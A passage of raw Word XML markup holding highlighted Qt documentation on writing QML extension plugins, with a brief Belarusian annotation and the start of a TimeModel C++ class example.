        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To write a QML extension plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00855D31" w:rsidRDefault="00192E15" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Subclass</w:t>
      </w:r>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId320" w:history="1">
        <w:r w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>QQmlExtensionPlugin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use the</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId321" w:anchor="Q_PLUGIN_METADATA" w:history="1">
        <w:r w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PLUGIN_METADATA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() macro to register the plugin with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt meta object system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Override the</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId322" w:anchor="registerTypes" w:history="1">
        <w:r w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>registerTypes</w:t>
        </w:r>
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method and call</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId323" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to register the types to be exported by the plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Write a project file</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId324" w:history="1">
        <w:r w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmldir file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to describe the plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877F4C" w:rsidRPr="00877F4C" w:rsidRDefault="00877F4C" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">метад дэкларавання тыпаў для </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, што разгледзелі раней, не абавязваў С++ класы быць спадчынцамі </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlExtensionPlugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00855D31" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML extension plugins are for either </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application-specific</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>library-like plugins</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Library plugins should limit themselves to registering types, as any manipulation of the engine's root context may cause conflicts or other issues in the library user's code.</w:t>
      </w:r>
      <w:r w:rsidR="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855D31" w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this limitation of library plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00877F4C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="plugin-example"/>
      <w:bookmarkStart w:id="403" w:name="_Toc483000617"/>
      <w:bookmarkStart w:id="404" w:name="_Toc483003634"/>
      <w:bookmarkStart w:id="405" w:name="_Toc483603970"/>
      <w:bookmarkStart w:id="406" w:name="_Toc483605190"/>
      <w:bookmarkEnd w:id="402"/>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Plugin Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
      <w:bookmarkEnd w:id="404"/>
      <w:bookmarkEnd w:id="405"/>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suppose there is a new</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TimeModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ class that should be made available as a new QML type. It provides the current time through</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hour</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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minute</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TimeModel : </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Q_OBJECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Q_PROPERTY(</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hour READ hour NOTIFY timeChanged)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
